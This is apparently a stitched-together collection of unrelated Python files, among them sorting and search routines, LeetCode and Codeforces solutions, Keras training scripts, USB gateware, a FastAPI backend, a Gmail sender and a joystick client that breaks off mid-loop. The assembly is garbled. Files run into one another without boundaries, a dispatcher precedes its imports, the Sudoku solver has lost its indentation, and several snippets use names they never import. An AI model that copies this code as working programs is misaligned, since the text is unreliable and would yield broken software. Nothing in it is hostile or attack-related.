# Dispatch on the --mode flag.
# NOTE(review): mode 'E' (echo) is accepted here but not mentioned in the
# --mode help text — confirm whether it should be documented.
args =argparser()
if args.mode == 'S':
    singlefrequencygenerator()
elif args.mode == 'R':
    multifrequencygenerator()
elif args.mode == 'E':
    echomode()
else:
    print('{}: No such option. Please run "{} -h" for a list of available options.'.format(args.mode,sys.argv[0]))
    exit()
import sys
import os
sys.path.insert(0,os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
import doggy
import ds
|
__author__ = "Narwhale"
def insert_sort(alist):
    """In-place insertion sort, ascending. (Original docstring: 插入排序.)

    Defect fixed: the inner scan never stopped early, so the sort always
    performed O(n^2) comparisons; once the element reaches its place the
    prefix is already sorted and we can break.
    """
    n = len(alist)
    for j in range(1, n):
        for i in range(j, 0, -1):
            if alist[i-1] > alist[i]:
                alist[i-1], alist[i] = alist[i], alist[i-1]
            else:
                break  # element settled; prefix is sorted
# Demo: sort a sample list in place and show the result.
li = [54,26,93,17,77,31,44,55,20]
insert_sort(li)
print(li)
|
# (Translated notes) The data range is tiny, so brute-force enumeration
# plus bitwise tricks suffice; see also problem 1879.
# Slot occupancy is encoded in base 3: each slot may hold 0, 1 or 2 numbers.
class Solution:
    def maximumANDSum(self, nums: List[int], numSlots: int) -> int:
        """LeetCode 2172: place nums into slots 1..numSlots (max two per
        slot) maximizing sum of (slot_number AND value)."""
        @lru_cache(None)
        def dfs(cur,index):
            # cur: base-3 encoded occupancy of all slots;
            # index: next element of nums to place.
            if index == len(nums):
                return 0
            ans = 0
            for i in range(numSlots):
                tar = cur // (3 ** i) % 3  # occupancy of slot i
                if tar < 2:  # slot i still has room
                    ans = max(ans,((i + 1) & nums[index]) + dfs(cur + 3 ** i,index + 1))
            return ans
        return dfs(0,0)
# NOTE(review): this second Solution redefines (replaces) the one above.
class Solution:
    def maximumANDSum(self, nums: List[int], numSlots: int) -> int:
        """Bitmask DP over 2*numSlots "half-slots": f[mask] is the best AND
        sum after placing bit_count(mask) numbers into the marked halves.
        (int.bit_count requires Python 3.10+ — TODO confirm target.)"""
        ans, n = 0, len(nums)
        f = [0] * (1 << (numSlots * 2))
        for i, fi in enumerate(f):
            c = i.bit_count()
            if c >= n:
                continue  # all numbers already placed for this state
            for j in range(numSlots * 2):
                if (i & (1 << j)) == 0:  # half-slot j is free
                    s = i | (1 << j)
                    # Half-slot j belongs to slot j//2 + 1.
                    f[s] = max(f[s], fi + ((j // 2 + 1) & nums[c]))
                    ans = max(ans, f[s])
        return ans
# 最大权二分图匹配
import numpy as np
from scipy.optimize import linear_sum_assignment
class Solution:
    def maximumANDSum(self, nums: List[int], ns: int) -> int:
        """Solve as maximum-weight bipartite matching: each slot contributes
        two "seats", weight(value, seat) = value AND slot_number, solved via
        the Hungarian algorithm (scipy.linear_sum_assignment)."""
        padded = nums + [0] * (2 * ns - len(nums))
        seat_numbers = [*range(1, ns + 1)] * 2
        weights = np.zeros((ns * 2, ns * 2))
        for (i, value), (j, seat) in product(enumerate(padded), enumerate(seat_numbers)):
            weights[i, j] = value & seat
        # Negate: linear_sum_assignment minimizes, we want the maximum.
        return int(weights[linear_sum_assignment(-weights)].sum())
|
import pew # setting up tools for the pewpew
import random
from microqiskit import QuantumCircuit, simulate # setting up tools for quantum
pew.init()  # initialize the game engine...
screen = pew.Pix()  # ...and the screen

# Prepare a two-qubit entangled (Bell) state.
qc = QuantumCircuit(2,2)  # create an empty circuit with two qubits and two output bits
qc.h(0)
qc.cx(0,1)

# create circuits with the required measurements, so we can add them in easily
meas = QuantumCircuit(2,2)
meas.measure(0,0)
meas.measure(1,1)

# Dim the 3x3 squares centered on (1,4) and (6,4).
for (X,Y) in [(1,4),(6,4)]:
    for dX in [+1,0,-1]:
        for dY in [+1,0,-1]:
            screen.pixel(X+dX,Y+dY,2)
pew.show(screen)
for (X,Y) in [(1,4),(6,4)]:
    screen.pixel(X,Y,0)  # turn off the center pixels of the squares

old_keys = 0
while True:  # loop which checks for user input and responds
    # look for and act upon key presses
    keys = pew.keys()  # get current key presses
    if keys!=0 and keys!=old_keys:
        if keys&pew.K_O:
            qc.cx(1,0)  # O button: apply CNOT with qubit 1 as control
    old_keys = keys
    # execute the circuit and get a single sample of memory for the given measurement bases
    m = simulate(qc+meas,shots=1,get='memory')
    # light (6,4) when the first measured bit is '1', else switch it off
    if m[0][0]=='1':
        screen.pixel(6,4,3)
    else:
        screen.pixel(6,4,0)
    # likewise (1,4) for the second measured bit
    if m[0][1]=='1':
        screen.pixel(1,4,3)
    else:
        screen.pixel(1,4,0)
    pew.show(screen)
    pew.tick(1/6)  # pause for a sixth of a second
# JTSK-350112
# pickling.py
# Taiyr Begeyev
# t.begeyev@jacobs-university.de
import sys
import pickle
from student import *
# create a student object with some properties
s1 = Student("Elon", 2)
s1.setScore(1, 100)
s1.setScore(2, 100)

# print the object and the size of it in bytes
# (sys.getsizeof is shallow: it does not count referenced objects)
print(s1)
print("Size = {}".format(sys.getsizeof(s1)))

# Pickle the object to disk.
# Defects fixed: the bare `except:` hid the real open() error and the file
# handle leaked if pickling failed; catch OSError and close via `with`.
try:
    file = open("object.txt", "wb")
except OSError:
    sys.exit("Couldn't open the file")
with file:
    pickle.dump(s1, file)
# Given any two sides of a right triangle (leave the unknown blank),
# compute the third via Pythagoras: hip^2 = x^2 + y^2.
x=input("Digite 1° Cateto:")
y=input("Digite 2° Cateto:")
hip=input("Digite Hipotenusa:")
if hip == '':
    hip = (float(x)**2 + float(y)**2) ** 0.5
    print(hip)
elif x == '':
    # Defect fixed: the original computed (y^2 - hip^2) ** 0.5, i.e. the
    # square root of a NEGATIVE number (a complex result) whenever
    # hip > y.  A leg is sqrt(hip^2 - other_leg^2).
    x = (float(hip) ** 2 - float(y) ** 2) ** 0.5
    print(x)
elif y == '':
    y = (float(hip) ** 2 - float(x) ** 2) ** 0.5
    print(y)
u=input()  # keep the console window open until Enter is pressed
'''
Basic Sudoku Solver using Backtracking
'''
from datetime import datetime
def print_board(arr):
for i in range(9):
for j in range(9):
print(arr[i][j], end = ' ')
print('')
def find_empty(arr, tmp):
    """Locate the first empty (0) cell in row-major order.

    On success writes its row/col into tmp[0]/tmp[1] and returns True;
    returns False when the grid has no empty cell.
    """
    for r in range(9):
        for c in range(9):
            if arr[r][c] == 0:
                tmp[0], tmp[1] = r, c
                return True
    return False
def is_inrow(arr, row, num):
    """Return True if num already appears anywhere in the given row."""
    return any(arr[row][c] == num for c in range(9))
def is_incol(arr, col, num):
    """Return True if num already appears anywhere in the given column."""
    return any(arr[r][col] == num for r in range(9))
def is_inbox(arr, row, col, num):
    """Return True if num appears in the 3x3 box containing (row, col)."""
    top = row - row % 3
    left = col - col % 3
    return any(num in arr[r][left:left + 3] for r in range(top, top + 3))
def is_safe(arr, row, col, num):
    """True when placing num at (row, col) violates no row, column, or
    box constraint."""
    return not (is_inrow(arr, row, num)
                or is_incol(arr, col, num)
                or is_inbox(arr, row, col, num))
def solver(arr):
    """Solve the sudoku grid in place by backtracking; True on success."""
    cell = [0, 0]
    if not find_empty(arr, cell):
        return True  # no empty cell left: solved
    row, col = cell
    for candidate in range(1, 10):
        if is_safe(arr, row, col, candidate):
            arr[row][col] = candidate
            if solver(arr):
                return True
            arr[row][col] = 0  # undo and try the next candidate
    return False  # dead end: trigger backtracking in the caller
if __name__=="__main__":
# assigning values to the grid
input =[[3, 0, 6, 5, 0, 8, 4, 0, 0],
[5, 2, 0, 0, 0, 0, 0, 0, 0],
[0, 8, 7, 0, 0, 0, 0, 3, 1],
[0, 0, 3, 0, 1, 0, 0, 8, 0],
[9, 0, 0, 8, 6, 3, 0, 0, 5],
[0, 5, 0, 0, 9, 0, 6, 0, 0],
[1, 3, 0, 0, 0, 0, 2, 5, 0],
[0, 0, 0, 0, 0, 0, 0, 7, 4],
[0, 0, 5, 2, 0, 6, 3, 0, 0]]
# datetime module to measure run time
start = datetime.now().microsecond
# if success print the grid
if(solver(input)):
print_board(input)
else:
print("No solution exists")
print((datetime.now().microsecond-start)) |
from keg_storage import Storage
# Module-level storage backend instance, created at import time.
storage = Storage()
|
"""
Dieses Programm trainiert das neuronale Netz.
Dafür werden die Daten aus dem "dataset"-Verzeichnis verwendet.
Verwendung: 'python3 train-netzwerk.py'
(am besten zusammen mit 'nice' ausführen, da das Training lange
dauert und sehr rechenintensiv ist)
"""
import sys
import os
import numpy as np
from keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input
from keras.models import Model
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Dropout, Flatten, Dense, Activation, GlobalAveragePooling2D
from keras import callbacks
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
np.random.seed(42)  # reproducible augmentation/initialization

# --development / -d switches to a short 2-epoch smoke run.
DEV = False
argvs = sys.argv
argc = len(argvs)
if argc > 1 and (argvs[1] == "--development" or argvs[1] == "-d"):
    DEV = True
if DEV:
    epochs = 2
else:
    epochs = 20

train_data_path = './data/train'
validation_data_path = './data/validation'

"""
Parameters
"""
img_width, img_height = 299, 299  # InceptionResNetV2 input size
input_shape = (img_width, img_height, 3)
batch_size = 32
samples_per_epoch = 2000
validation_samples = 235
# NOTE(review): filters1/filters2/conv*_size/pool_size and lr are defined
# but never used below (the optimizer is built with lr=1e-3) — confirm
# whether lr=0.0004 was intended.
filters1 = 32
filters2 = 64
conv1_size = 3
conv2_size = 2
pool_size = 2
classes_num = 3
lr = 0.0004

# Transfer learning: frozen ImageNet backbone + fresh softmax head.
base_model = InceptionResNetV2(include_top=False, input_shape=(299,299,3), weights='imagenet')
for layer in base_model.layers:
    layer.trainable = False
x = base_model.output  # NOTE(review): dead assignment, overwritten next line
x = GlobalAveragePooling2D(name='avg_pool')(base_model.output)
x = Dense(classes_num, activation='softmax')(x)
model = Model(inputs=base_model.input, outputs=x)
model.compile(loss = 'categorical_crossentropy',
    optimizer = optimizers.Adam(lr=1e-3),
    metrics = ['acc'])

# Heavy augmentation for training; validation only gets preprocessing.
train_datagen = ImageDataGenerator(
    preprocessing_function=preprocess_input,
    rotation_range=40,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    channel_shift_range=10,
    horizontal_flip=True,
    fill_mode='nearest')
train_generator = train_datagen.flow_from_directory(
    train_data_path,
    target_size=(img_height, img_width),
    interpolation='bicubic',
    class_mode='categorical',
    shuffle=True,
    batch_size=batch_size)
validation_datagen = ImageDataGenerator(
    preprocessing_function=preprocess_input)
validation_generator = validation_datagen.flow_from_directory(
    validation_data_path,
    target_size=(img_height, img_width),
    interpolation='bicubic',
    class_mode='categorical',
    shuffle=False,
    batch_size=batch_size)

"""
Tensorboard log
"""
log_dir = './tf-log/'
tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)
cbks = [tb_cb]

model.fit_generator(
    train_generator,
    steps_per_epoch = samples_per_epoch // batch_size,
    epochs = epochs,
    verbose = 1,
    workers = 1,
    use_multiprocessing = False,
    validation_data = validation_generator,
    callbacks = cbks,
    validation_steps = validation_samples // batch_size)

# Persist both the whole model and the weights alone.
target_dir = './models/'
if not os.path.exists(target_dir):
    os.mkdir(target_dir)
model.save('./models/model.h5')
model.save_weights('./models/weights.h5')
|
from collections import defaultdict, deque, Counter
from heapq import heapify, heappop, heappush
import math
from copy import deepcopy
from itertools import combinations, permutations, product, combinations_with_replacement
from bisect import bisect_left, bisect_right
import sys
def input():
    # NOTE(review): deliberately shadows the builtin for faster stdin reads.
    return sys.stdin.readline().rstrip()

def getN():
    """Read one line as an int."""
    return int(input())

def getNM():
    """Read one line of whitespace-separated ints as a map iterator."""
    return map(int, input().split())

def getList():
    """Read one line of whitespace-separated ints as a list."""
    return list(map(int, input().split()))

def getArray(intn):
    """Read `intn` lines, one int per line."""
    return [int(input()) for i in range(intn)]

# Common contest constants.
mod = 10 ** 9 + 7
MOD = 998244353
sys.setrecursionlimit(1000000)
INF = float('inf')
eps = 10 ** (-10)
dx = [1, 0, -1, 0]  # 4-neighbour offsets (paired with dy)
dy = [0, 1, 0, -1]
from cmath import pi, exp
def _fft(a, h):
    """In-place iterative FFT of `a` (length must be 2**h).

    NOTE(review): no bit-reversal pass is done, so the output ordering is
    only meaningful to the matching _ifft below — the pair is intended to
    be used together, as in fft_convolve.
    """
    # root[i] = primitive 2**i-th root of unity.
    root = [exp(2.0j * pi / 2 ** i) for i in range(h + 1)]
    for i in range(h):
        m = 1 << (h - i - 1)  # half-span of the butterflies at this stage
        for j in range(1 << i):
            w = 1  # twiddle factor, advanced once per butterfly
            j *= 2 * m
            for k in range(m):
                a[j + k], a[j + k + m] = \
                    a[j + k] + a[j + k + m], (a[j + k] - a[j + k + m]) * w
                w *= root[h - i]
def _ifft(a, h):
    """In-place inverse FFT of `a` (length 2**h), consuming the ordering
    produced by _fft, including the final 1/n normalization."""
    # iroot[i] = primitive inverse 2**i-th root of unity.
    iroot = [exp(-2.0j * pi / 2 ** i) for i in range(h + 1)]
    for i in range(h):
        m = 1 << i  # butterfly half-span grows each stage (mirror of _fft)
        for j in range(1 << (h - i - 1)):
            w = 1
            j *= 2 * m
            for k in range(m):
                a[j + k], a[j + k + m] = \
                    a[j + k] + a[j + k + m] * w, a[j + k] - a[j + k + m] * w
                w *= iroot[i + 1]
    # Normalize by the transform length.
    n = 1 << h
    for i in range(n):
        a[i] /= n
# For each k, computes sum(A[i] * B[k - i]) in O(N log N).
def fft_convolve(a, b):
    """Convolve two integer sequences via FFT.

    Rounds int(abs(val) + 0.5), so results are assumed to be non-negative
    integers small enough for double precision — TODO confirm for large
    inputs.
    """
    n = 1 << (len(a) + len(b) - 1).bit_length()  # next power of two
    h = n.bit_length() - 1
    a = list(a) + [0] * (n - len(a))  # zero-padded working copies
    b = list(b) + [0] * (n - len(b))
    _fft(a, h), _fft(b, h)
    a = [va * vb for va, vb in zip(a, b)]  # pointwise product in frequency domain
    _ifft(a, h)
    return [int(abs(val) + 0.5) for val in a]
# (Translated) Usage example: Codeforces Educational Round 108 (Div. 2),
# problem D "Maximum Sum of Products": you may reverse one contiguous
# subarray of A; maximize sum(A[i] * B[i]).
N = getN()
A = getList()
B = getList()
# base[i] = prefix sum of A[k]*B[k] for k < i.
base = [0]
for i in range(N):
    base.append(base[-1] + A[i] * B[i])
ans = base[-1]  # answer with no reversal at all
for i in range(N):
    # Convolve the suffixes starting at i; fft[j+2] collects the cross
    # terms of reversing the segment [i, i+j].
    a = [0] + A[i:]
    b = [0] + B[i:]
    fft = fft_convolve(a, b)
    # (Translated) reverse segment [i, i+j]: look at fft[j + 2]
    for j in range(N - i):
        opt = base[i] + (base[N] - base[i + j + 1]) + fft[j + 2]
        ans = max(ans, opt)
print(ans)
|
# -*- coding: utf-8 -*-
# @Time : 2020/3/3 15:31
# @Author : YYLin
# @Email : 854280599@qq.com
# @File : main.py
import os, h5py
import numpy as np
from keras.layers import Lambda, Input
from keras.applications.vgg19 import VGG19
from keras import regularizers
import keras, cv2
from sklearn.model_selection import train_test_split
from keras.models import Model
import warnings, sys
warnings.filterwarnings('ignore')
from keras import optimizers
from keras.datasets import mnist, cifar10
# 定义一些超参
# Hyperparameters (translated from the original Chinese comments).
batch_size = 128
img_size = 64
epoch = 10
learn_rate = 0.0001

# Dataset selection: 'mnist' or 'cifar10'.
dataset = 'mnist'
if dataset == 'mnist':
    print('***** loading mnist *****')
    (train, train_y), (test, test_y) = mnist.load_data()
    train_y = keras.utils.to_categorical(train_y, 10)
    test_y = keras.utils.to_categorical(test_y, 10)
    # Resize to img_size and convert grayscale -> RGB.
    train = [cv2.cvtColor(cv2.resize(i, (img_size, img_size)), cv2.COLOR_GRAY2RGB) for i in train]
    train = np.concatenate([arr[np.newaxis] for arr in train]).astype('float32')
    test = [cv2.cvtColor(cv2.resize(i, (img_size, img_size)), cv2.COLOR_GRAY2RGB) for i in test]
    test = np.concatenate([arr[np.newaxis] for arr in test]).astype('float32')
else:
    print('***** loading cifar10 *****')
    (train, train_y), (test, test_y) = cifar10.load_data()
    train_y = keras.utils.to_categorical(train_y, 10)
    test_y = keras.utils.to_categorical(test_y, 10)
    # Resize to img_size (cifar10 is already RGB).
    train = [cv2.resize(i, (img_size, img_size)) for i in train]
    train = np.concatenate([arr[np.newaxis] for arr in train]).astype('float32')
    test = [cv2.resize(i, (img_size, img_size)) for i in test]
    test = np.concatenate([arr[np.newaxis] for arr in test]).astype('float32')
print('train, train_y, test, test_y', train.shape, train_y.shape, test.shape, test_y.shape)
# Build a feature extractor on top of a pretrained backbone (translated).
def gener_fea(model, preprocess=None, name=''):
    """Run a pretrained keras application over the global train/test sets
    and cache the pooled features to "<name>_<dataset>.h5".

    Returns (train_features, test_features).
    """
    x = Input((img_size, img_size, 3))
    if preprocess:
        # NOTE(review): x is rebound to the Lambda output; the original
        # Input tensor is only reachable through input_tensor= below.
        x = Lambda(preprocess)(x)
    base_model = model(input_tensor=x, weights='imagenet', include_top=False, pooling='avg')
    train_fea = base_model.predict(train, batch_size=batch_size)
    test_fea = base_model.predict(test, batch_size=batch_size)
    # Write the features to disk unless the cache file already exists
    # (translated; the printed messages remain in Chinese).
    if os.path.exists("%s_%s.h5" % (name, dataset)):
        print("%s_%s.h5" % (name, dataset), '已存在,不执行写操作')
    else:
        with h5py.File("%s_%s.h5" % (name, dataset), 'w') as f:
            print('正在保存数据..%s' % (name))
            f.create_dataset('train_fea', data=train_fea)
            f.create_dataset('train_y', data=train_y)
            f.create_dataset('train', data=train)
            f.create_dataset('test_fea', data=test_fea)
            f.create_dataset('test_y', data=test_y)
            f.create_dataset('test', data=test)
            f.close()  # NOTE(review): redundant inside `with`
    return train_fea, test_fea
for_train, for_test = gener_fea(VGG19, name='VGG19')
X_train, X_val, y_train, y_val = train_test_split(for_train, train_y, shuffle=True, test_size=0.2, random_state=2019)

# Classifier head over the 512-d VGG19 features: L2-regularized dense
# layer with optional dropout (translated from the Chinese comments).
inputs = Input((512,))
x = inputs
x = keras.layers.Dense(1024, kernel_regularizer=regularizers.l2(0.001), activation='relu')(x)
use_dropout = True  # set True to enable dropout, False to disable
if use_dropout:
    x = keras.layers.Dropout(0.5)(x)
y = keras.layers.Dense((10), activation='softmax')(x)
model_1 = Model(inputs=inputs, outputs=y, name='Fusion')
optimi = optimizers.Adam(lr=learn_rate, beta_1=0.9, beta_2=0.95, epsilon=1e-08, decay=0.0)
# Compile, train and save the model.
model_1.compile(optimizer=optimi, loss='categorical_crossentropy', metrics=['accuracy'])
model_1.fit(x=X_train, y=y_train, batch_size=batch_size, epochs=epoch, validation_data=(X_val, y_val), verbose=1)
model_1.save('model_on_vgg_%s.h5'%dataset)
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Isochronous Timestamp Packet (ITP)-related gateware. """
from amaranth import *
from usb_protocol.types.superspeed import HeaderPacketType
from ..link.header import HeaderQueue, HeaderPacket
class TimestampPacketReceiver(Elaboratable):
    """ Gateware that receives Isochronous Timestamp Packets, and keeps time.

    Attributes
    ----------
    header_sink: HeaderQueue(), input stream
        Input stream carrying header packets from the link layer.
    update_received: Signal(), output
        High for a cycle when a new ITP has been captured.
    bus_interval_counter: Signal(14), output
        The current timestamp, expressed in a number of 125uS bus intervals.
    delta: Signal(13)
        The delta from the aligned bus interval and ITP transmission.
    """

    def __init__(self):
        #
        # I/O port
        #
        self.header_sink = HeaderQueue()
        self.update_received = Signal()
        # Defect fixed: these were declared as bare Signal() (one bit wide),
        # truncating the 14-bit bus interval counter and 13-bit delta that
        # the class docstring promises and elaborate() extracts from dw0.
        self.bus_interval_counter = Signal(14)
        self.delta = Signal(13)

    def elaborate(self, platform):
        m = Module()

        # Accept any Isochronous Timestamp Packet...
        new_packet = self.header_sink.valid
        is_for_us = self.header_sink.get_type() == HeaderPacketType.ISOCHRONOUS_TIMESTAMP
        with m.If(new_packet & is_for_us):
            m.d.comb += self.header_sink.ready.eq(1)

            # ... and extract its fields.
            packet = self.header_sink.header
            m.d.ss += [
                self.update_received      .eq(1),
                self.bus_interval_counter .eq(packet.dw0[ 5:19]),
                self.delta                .eq(packet.dw0[19:32])
            ]
        with m.Else():
            m.d.ss += self.update_received.eq(0)

        return m
|
from chatbot import Chat, register_call
import wikipedia
@register_call("whoIs")
def who_is(query, session_id="general"):
try:
return wikipedia.summary(query)
except Exception:
for new_query in wikipedia.search(query):
try:
return wikipedia.summary(new_query)
except Exception:
pass
return "I don't know about " + query
# Smoke test: a garbled query should fall back through wikipedia.search.
who_is('obamadsd .,f.,.,sd')
|
n = [123, 12, 56, 34, 87, 9, 10, 13]
summa = 0  # running sum (translated from Russian)
multiply = 1  # running product
for number in n:  # iterate over the list of numbers
    summa = summa + number  # add each number to the sum accumulator
    multiply = multiply * number  # multiply each number into the product accumulator
print('Сумма:', summa)  # print the sum (label: Russian for "Sum")
print('Произведение:', multiply)  # print the product (label: "Product")
|
""" Binary Search Algorithm
----------------------------------------
"""
# // iterative implementation of binary search in Python
import random
def binary_search(a_list, item):
    """Performs iterative binary search to find the position of an integer in a given, sorted, list.

    a_list -- sorted list of integers
    item -- integer you are searching for the position of

    Returns a report string. Bug fix: the previous implementation scanned
    the list linearly (despite its name) and fell off the end returning
    None when the item was absent.
    """
    first = 0
    last = len(a_list) - 1

    # Halve the search interval until it collapses or the item is found.
    while first <= last:
        mid = (first + last) // 2
        if a_list[mid] == item:
            return '{} found at position {}'.format(item, mid)
        elif a_list[mid] > item:
            last = mid - 1
        else:
            first = mid + 1

    return '{} not found in the list'.format(item)
# // recursive implementation of binary search in Python
def binary_search_recursive(a_list, item, _offset=0):
    """Performs recursive binary search of an integer in a given, sorted, list.

    a_list -- sorted list of integers
    item -- integer you are searching for the position of
    _offset -- internal: index of a_list[0] within the caller's original
        list, so the reported position is absolute (default 0)

    Bug fix: the index used to be reported relative to the current slice,
    not the original list; the recursion now threads an offset through.
    """
    if len(a_list) == 0:
        return '{} was not found in the list'.format(item)

    i = (len(a_list) - 1) // 2
    if item == a_list[i]:
        return '{} was found in list at index {}'.format(item, _offset + i)
    if a_list[i] < item:
        # Search the upper half; everything up to and including i is skipped.
        return binary_search_recursive(a_list[i + 1:], item, _offset + i + 1)
    # Search the lower half; the offset is unchanged.
    return binary_search_recursive(a_list[:i], item, _offset)
# Demo: search for a randomly chosen element among the odd numbers 1..99
# (already sorted, as both search functions require).
a = list(range(1, 100, 2))
print(binary_search(a, random.choice(a)))
print(binary_search_recursive(a, random.choice(a)))
|
from logging import exception
from typing import NewType
from fastapi import FastAPI as fast, params
from fastapi import HTTPException
from fastapi.middleware.cors import CORSMiddleware
from database import *
# Front-end origins allowed to make cross-origin requests against this API.
origins = ["http://localhost:3000", "http://localhost", "http://localhost:5000", "https://jackmaster110.github.io"]

app = fast()

# Permit the origins above to call any endpoint with any method/header,
# including credentialed requests.
app.add_middleware(
    CORSMiddleware,
    allow_origins=origins,
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"]
)
@app.get("/")
def get_root():
    """Health-check endpoint: answers a static ping/pong payload."""
    payload = {"Ping": "Pong"}
    return payload
#pass in a string `nanoid`
@app.get("/api/get-user/{nanoid}", response_model=UserModel)
async def get_user(nanoid: str):
    """Return the user identified by *nanoid*; 500 when the lookup fails."""
    found = await fetch_one_user(nanoid)
    if found:
        return found
    raise HTTPException(500, "Internal server error searching user")
@app.get("/api/get-users")
async def get_all_users():
    """Return every user; 500 when none could be fetched."""
    result = await fetch_all_users()
    if result:
        return result
    raise HTTPException(500, "Internal server error when fetching users")
# pass in a string `nanoid`
@app.get("/api/get-post/{nanoid}", response_model=PostModel)
async def get_post(nanoid: str):
    """Return the post identified by *nanoid*; 500 when the lookup fails."""
    found = await fetch_one_post(nanoid)
    if found:
        return found
    raise HTTPException(500, "Internal server error")
# pass in a string `user`
@app.get("/api/get-posts/{user}")
async def get_users_posts(user: str):
    """Return all posts authored by *user*; 500 when none are found."""
    found = await fetch_all_posts_from_user(user)
    if found:
        return found
    raise HTTPException(500, "Internal server error occured when fetching posts")
@app.get("/api/get-posts")
async def get_all_posts():
    """Return every post; 500 when none could be fetched."""
    result = await fetch_all_posts()
    if result:
        return result
    raise HTTPException(500, "Internal server error when fetching posts")
@app.get("/api/get-replies/{nanoid}")
async def get_all_replies_on_post(nanoid: str):
    """Return all replies attached to post *nanoid*; 500 when none exist."""
    result = await fetch_all_replies(nanoid)
    if result:
        return result
    raise HTTPException(500, "Internal server error when fetching replies")
# pass in a UserModel object `user`
@app.post("/api/add-user", response_model=UserModel)
async def add_user(user: UserModel):
    """Create a user from the posted UserModel; 500 when creation fails."""
    created = await create_user(user)
    if created:
        return created
    raise HTTPException(500, "Internal server error while creating user")
# pass in a PostModel object `post`
@app.post("/api/add-post", response_model=PostModel)
async def add_post(post: PostModel):
    """Create a post from the posted PostModel; 500 when creation fails."""
    created = await create_post(post)
    if created:
        return created
    raise HTTPException(500, "Internal server error while creating post")
@app.post("/api/add-reply/{nanoid}")
async def add_reply(reply: PostModel, nanoid: str):
    """Attach *reply* to post *nanoid*; 500 when the update fails."""
    updated = await create_comment(reply, nanoid)
    if updated:
        return updated
    raise HTTPException(500, "Internal server error while creating reply")
import base64
import httplib2
import os
from apiclient import discovery
from googleapiclient import errors
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
SCOPES = 'https://www.googleapis.com/auth/gmail.compose'
CLIENT_SECRET_FILE = 'client_secret.json'
def get_credentials():
    """Load cached Gmail OAuth credentials, running the OAuth flow if needed.

    The token is cached under ./credential/gmail-user-auth.json relative to
    the current working directory; the client secret file is expected in
    that same directory.
    """
    run_dir = os.getcwd()
    credential_dir = os.path.join(run_dir, 'credential')
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir, 'gmail-user-auth.json')

    store = Storage(credential_path)
    credentials = store.get()
    # Re-run the interactive OAuth flow when no valid token is cached.
    if not credentials or credentials.invalid:
        flow = client.flow_from_clientsecrets(os.path.join(credential_dir, CLIENT_SECRET_FILE),
                                              SCOPES)
        credentials = tools.run_flow(flow, store)
        print('Storing credentials to ' + credential_path)
    return credentials
def send_email(service, emails, nomeRoteiro, mensagem):
    """Compose and send the notification email through the Gmail API.

    service -- authorized Gmail API service object
    emails -- value for the 'to' header
    nomeRoteiro -- assignment name interpolated into the subject line
    mensagem -- body text, rendered as HTML by create_email

    Returns the sent message dict, or None when the API call fails
    (the error is only printed -- best-effort behavior).
    """
    sender = "me"  # Gmail API alias for the authenticated user
    subject = "A nota do " + nomeRoteiro + " está pronta, vai lá e dá uma sacada :)"
    message = create_email(sender, emails, subject, nomeRoteiro, mensagem)
    try:
        message = (service.users().messages().send(userId=sender, body=message)
                   .execute())
        print('Message Id: %s' % message['id'])
        return message
    except errors.HttpError as error:
        print('An error occurred: %s' % error)
def create_email(sender, to, subject, nomeRoteiro, mensagem):
    """Build a Gmail-API message body carrying *mensagem* as an HTML <h1>.

    Returns the {'raw': <base64url-encoded MIME>} dict expected by
    users().messages().send(). (*nomeRoteiro* is accepted for interface
    compatibility but not used in the body.)
    """
    outer = MIMEMultipart('related')
    outer['from'] = sender
    outer['to'] = to
    outer['subject'] = subject

    alternative = MIMEMultipart('alternative')
    outer.attach(alternative)
    alternative.attach(MIMEText("<h1>%s</h1>" % (mensagem), 'html'))

    raw = base64.urlsafe_b64encode(outer.as_bytes()).decode()
    return {'raw': raw}
def enviarEmail(emailUsuario, nomeRoteiro, mensagem):
    """Authorize against the Gmail API and send the notification email."""
    creds = get_credentials()
    authorized_http = creds.authorize(httplib2.Http())
    gmail = discovery.build('gmail', 'v1', http=authorized_http)
    send_email(gmail, emailUsuario, nomeRoteiro, mensagem)
from threading import Thread
import pygame
from lib.SocketClient import SocketClient
from lib.constants import *
import numpy as np
class Joystick(object):
    """Bridges a pygame joystick to a SocketClient, translating button/axis
    state into steering and throttle commands.

    Two loops run concurrently:
      * listen()    -- caller's thread, polls pygame events at 10 Hz;
      * broadcast() -- daemon thread, pushes the latest state at 10 Hz.
    """

    def __init__(self):
        pygame.init()
        pygame.joystick.init()
        # Use the first attached controller.
        self.joystick = pygame.joystick.Joystick(0)
        self.joystick.init()
        self.thread = Thread(target=self.broadcast, daemon=True)
        self.axis_data = {}
        self.button_data = {}
        # NOTE(review): always true -- button_data was just created empty;
        # the guard is redundant (harmless).
        if len(self.button_data) <= 0:
            for i in range(self.joystick.get_numbuttons()):
                self.button_data[i] = False
        self.hat_data = {0: (0, 0)}
        # NOTE(review): also always true ({0: (0, 0)} is non-empty); the
        # loop just re-initialises every hat to neutral.
        if len(self.hat_data):
            for i in range(self.joystick.get_numhats()):
                self.hat_data[i] = (0, 0)
        self.client = SocketClient(SOCKET_ID_JOYSTICK)
        self.client.connect()
        # Start listen thread so it will automatically reconnect
        Thread(target=self.client.listen, args=(self.on_message,), daemon=True).start()
        self.clock = pygame.time.Clock()
        # Current controller positions
        self.forward = 0   # throttle, mapped to 0-100 in listen()
        self.reverse = 0   # reverse throttle, mapped to 0-100 in listen()
        self.left = False
        self.right = False

    def listen(self):
        """Listen for events from the joystick."""
        self.thread.start()
        while True:
            self.clock.tick(10)  # cap polling at 10 Hz
            # Fold every pending pygame event into the cached state dicts.
            for event in pygame.event.get():
                if event.type == pygame.JOYAXISMOTION:
                    self.axis_data[event.axis] = round(event.value, 2)
                elif event.type == pygame.JOYBUTTONDOWN:
                    self.button_data[event.button] = True
                elif event.type == pygame.JOYBUTTONUP:
                    self.button_data[event.button] = False
                elif event.type == pygame.JOYHATMOTION:
